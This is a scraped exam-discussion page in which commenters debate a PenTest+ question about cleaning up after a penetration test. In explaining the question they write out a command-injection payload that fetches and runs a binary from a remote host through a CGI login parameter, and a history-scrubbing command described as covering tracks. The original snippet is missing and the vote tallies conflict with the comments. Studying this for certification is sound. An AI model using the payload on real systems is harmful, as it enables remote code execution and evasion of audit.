A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: Which of the following commands should the penetration tester run post-engagement?
A.
grep -v apache ~/bash_history > ~/.bash_history
B. rm -rf /tmp/apache
From the code snippet it appears that the penetration tester has used a POST exploit to gain access to a system and executed a command that downloads a file named "apache" from the IP address 10.10.0.1, and then it runs it. The command also changes the permissions of the file to 777 which means it's giving full permissions to all users.
After the engagement, the penetration tester should clean up the system and return it to its original state. One of the first steps should be to remove the "apache" file from the system using the command "rm -rf /tmp/apache" to remove the file and the folder recursively.
Option A is not recommended because it's removing the apache line from the bash history, but it doesn't remove the file. Option C is not recommended because it's changing the permissions of the file, but it doesn't remove the file. Option D is not recommended because it's killing the process, but it doesn't remove the file.
Code Explaination:
an HTTP POST method will be used to send data to the server.
The url /cgi-bin/index.cgi?action=login&Path=... indicates that the exploit is trying to access to an CGI script for the login action
and Path variable contains a lot of concatenated commands!
/bin/sh$(system.IFS())-c$(system.IFS())'cd$(system.IFS())/tmp;:
opens a /bin/sh shell and it changes the current directory into /tmp
wget$(system.IFS())http://10.10.0.1/apache;
it uses wget to download the file "apache" from an url.
chmod${system.IFS()}777${system.IFS()}apache;:
./apache'%0A%27&loginUser=a&Pwd=a
it executes the downloaded "apache" file.
HTTP/1.1 indicates de version of the HTTP protocol to use.
system.IFS() is an Internal Field Separator and this variable defines delimitators used by the system to separate words and token including generally spaces, tabs and new lines.
In this situation it allows to concatenates commands.
not A. grep -v apache ~/bash_history > ~/.bash_history
because you are removing all commands with text "apache" in the bash_history, good after an attack but too extreme and non-surgical/non-precise, indiscriminate.
(grep -v shows all rows except the matched word, so then you replace the file with the "file without the word you find")
not C. chmod 600 /tmp/apache
The exploit code already change permission into 777, why you have to change in less?
And it doesn't remove the apache file, the best action after a post-engagement.
not D. taskkill /IM ג€apacheג€ /F
windows command to terminate a process. The question implicitally specifies linus as operating system, and also all other answer are on linux too.
Good answer B. rm -rf /tmp/apache
Why would it not be A. grep -v apache ~/bash_history > ~/.bash_history? This command will remove all lines from the ~/bash_history file that contain the word "apache". This covers tracks.
Because if you understand the snippet of code it shows that the command injection is making the victim server to download an executable into /tmp directory so it is clear that post exploitation you have to delete it. Clear answe is b
The snippet of code appears to be a command injection exploit that uses the web application's login form to execute arbitrary commands on the server. The code downloads an executable named "apache" from a remote server and runs it with root privileges.
I totally read this as "Post exploitation" at first rather than "Post Engagement" That makes a bit of a difference LOL. B is going to be it, so you can remove installed tools from the tested device
I would do B, as the pen tester was the person who uploaded the file and knows it's content. If I found such a file on a system, C: would be an option to consider.
The most important thing before deleting the /tmp/apache directory is to change the permissions from 777 to 600.
upvoted 1 times
...
This section is not available anymore. Please use the main Exam Page.PT0-002 Exam Questions
Log in to ExamTopics
Sign in:
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.
Upvoting a comment with a selected answer will also increase the vote count towards that answer by one.
So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.
RRabbit_111
Highly Voted 2 years, 3 months agopetercorn
Highly Voted 2 years, 6 months agoMr_BuCk3th34D
2 years, 4 months agoNONS3c
Most Recent 4 weeks agoMeisAdriano
7 months agoMeisAdriano
8 months, 3 weeks agoMeisAdriano
8 months, 3 weeks agojade290
1 year, 10 months agoKeToopStudy
1 year, 4 months agocy_analyst
2 years agoThe_F00L
2 years, 2 months agoftlfrm
2 years agolordguck
2 years, 4 months agoNeolot
2 years, 6 months ago